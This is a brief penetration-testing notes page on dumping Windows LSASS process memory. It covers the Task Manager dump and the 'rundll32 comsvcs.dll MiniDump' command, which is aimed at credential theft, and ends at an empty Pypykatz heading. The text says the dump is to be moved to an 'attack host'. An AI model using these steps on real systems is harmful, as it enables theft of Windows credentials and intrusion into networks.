Attacking LSASS

Dumping LSASS Process Memory

Task Manager Method

Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file

A file called lsass.DMP is created and saved in:

C:\\Users\\loggedonusersdirectory\\AppData\\Local\\Temp

This is the file we will transfer to our attack host

Rundll32.exe & Comsvcs.dll Method

# Finding LSASS PID in cmd
# From cmd, we can issue the command tasklist /svc and find lsass.exe and its process ID in the PID field.
C:\\Windows\\system32> tasklist /svc

# Finding LSASS PID in PowerShell
# From PowerShell, we can issue the command Get-Process lsass and see the process ID in the Id field.
Get-Process lsass

# Creating lsass.dmp using PowerShell
rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full

Using Pypykatz to Extract Credentials

Last updated